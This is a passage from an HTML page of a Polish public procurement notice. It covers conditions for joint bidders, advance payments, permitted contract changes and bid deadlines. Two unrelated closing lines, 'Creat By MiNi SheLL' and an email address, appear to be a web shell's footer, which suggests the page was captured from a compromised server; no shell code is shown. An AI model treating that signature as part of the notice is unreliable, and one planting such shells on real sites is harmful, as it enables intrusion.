w rejestrze sprawców przestępstw seksualnych oraz że nie figurują w tym rejestrze. Takie same czynności sprawdzające będą wymagane na etapie rozpoczęcia świadczenia usług wobec wszystkich osób mających kontakt z dziećmi. Ponadto, Wykonawca nie później niż na 7 dni przed rozpoczęciem świadczenia usług związanych z kontaktem z dziećmi, zobowiązany jest do przedłożenia Zamawiającemu zaświadczeń z KRK w stosunku do osób, które będą realizować zamówienie w zakresie obejmującym kontakt z dziećmi. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.<br/>2. Każdy wykonawca musi złożyć oświadczenie, o którym mowa w art. 125 ust. 1 ustawy.<br/>3. Każdy wykonawca musi załączyć do oferty dokumenty potwierdzające, że spełnia kryteria udziału w postępowaniu o udzielenie zamówienia zastrzeżonego (art. 94 ust. 1 ustawy PZP), tj. dokumentów potwierdzających status wykonawcy jako zakładu pracy chronionej lub spółdzielni socjalnej lub dokumentów potwierdzających prowadzenie przez wykonawcę lub przez jego wyodrębnioną organizacyjnie jednostkę, która będzie realizowała zamówienie, działalności, której głównym celem jest społeczna i zawodowa integracja osób społecznie marginalizowanych; W szczególności dokumentem potwierdzającym może być decyzja o nadaniu statusu przedsiębiorstwa społecznego.<br/>4. Każdy wykonawca musi załączyć do oferty oświadczenie Wykonawcy dotyczące spełniania wymogu określonego w art. 94 ust. 1 ustawy Pzp. <br/>5. Wykonawcy wspólnie ubiegający się załączają do oferty oświadczenie, z którego wynika, które roboty usługi wykonają poszczególni wykonawcy.<br/>5. Każdy wykonawca musi złożyć oświadczenie, w zakresie art. 108 ust. 1 pkt 5 ustawy PZP, o braku przynależności do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16.02.2007r. o ochronie konkurencji i konsumentów, z innym wykonawcą, który złożył odrębną ofertę, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej oraz oświadczenie o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy PZP, w zakresie podstaw wykluczenia z postępowania wskazanych przez Zamawiającego. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.2.) Informacje na temat zaliczek: </h3> 1. Zamawiający udzieli wykonawcy zaliczek na poczet wykonania zamówienia, każda w wysokości nie wyższej niż 20 % maksymalnego wynagrodzenia Wykonawcy. Możliwość udzielenia kolejnych zaliczek w wysokości określonej w zdaniu poprzedzającym, jest dopuszczalna pod warunkiem, że Wykonawca wykaże, że wykonał zamówienie w zakresie wartości poprzednio udzielonych zaliczek. Wykazanie zakresu wykonania zamówienia następuje poprzez przedłożenie przez Wykonawcę zestawienia poniesionych wydatków związanych z realizacją zamówienia.<br/>2. Zamawiający dokona zapłaty zaliczki w ciągu 14 dni od otrzymania prawidłowej faktury zaliczkowej lub rachunku.<br/>3. Wysokość wynagrodzenia wykonawcy ulegać będzie obniżeniu każdorazowo po zapłacie każdej zaliczki, w wysokości odpowiadającej wartości zapłaconej zaliczki.<br/>4. Zapłata nastąpi na rachunek bankowy Wykonawcy. <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Na podstawie art. 455 ust. 1 pkt 1 ustawy Pzp określa się następujące okoliczności i warunki dopuszczalności zmiany umowy:<br/>1) w związku ze zmianą umowy o dofinansowanie projektu, w ramach którego realizowany jest Przedmiot umowy, gdzie zmiana polegać będzie na dostosowaniu treści umowy do warunków wynikających ze zmiany umowy o dofinansowanie;<br/>2) w związku ze zmianą powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu umowy, gdzie zmiana będzie polegać będzie na dostosowaniu treści umowy do zmienionych przepisów prawa, bez wpływu na wysokość wynagrodzenia Wykonawcy;<br/>3) zaistnienia nowych, szczególnych okoliczności, niezależnych od Zamawiającego i Wykonawcy, uzasadniających zmiany terminu realizacji umowy, przy czym zmiana terminu może być dokonana tylko w zakresie wynikającym z tych okoliczności, bez wpływu na wysokość wynagrodzenia Wykonawcy;<br/>4) zaistnieniem innej niemożliwej do przewidzenia w momencie zawarcia umowy okoliczności prawnej, ekonomicznej lub technicznej, organizacyjnej, za którą żadna ze Stron nie ponosi odpowiedzialności, skutkującej brakiem możliwości należytego wykonania umowy zgodnie ze specyfikacją warunków zamówienia. <br/>5) zaistnienie sytuacji siły wyższej mającej wpływ na realizację umowy, przy czym za siłę wyższą (w szczególności: powódź, pożar i inne klęski żywiołowe, zamieszki, strajki, ataki terrorystyczne, działania wojenne, nagłe załamania warunków atmosferycznych, nagłe przerwy w dostawie energii elektrycznej, promieniowanie lub skażenia, epidemie, pandemie), gdzie zmiana będzie polegać będzie na dostosowaniu treści umowy celem uchylenia negatywnych skutków siły wyżej na realizację Przedmiotu umowy, bez wpływu na wysokość wynagrodzenia Wykonawcy.<br/>2. Zmiany umowy wymagają formy pisemnej pod rygorem nieważności. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-05-23 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę należy złożyć przez adres strony prowadzonego postępowania https://platformazakupowa.pl/transakcja/1109908.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-05-23 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-06-21</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com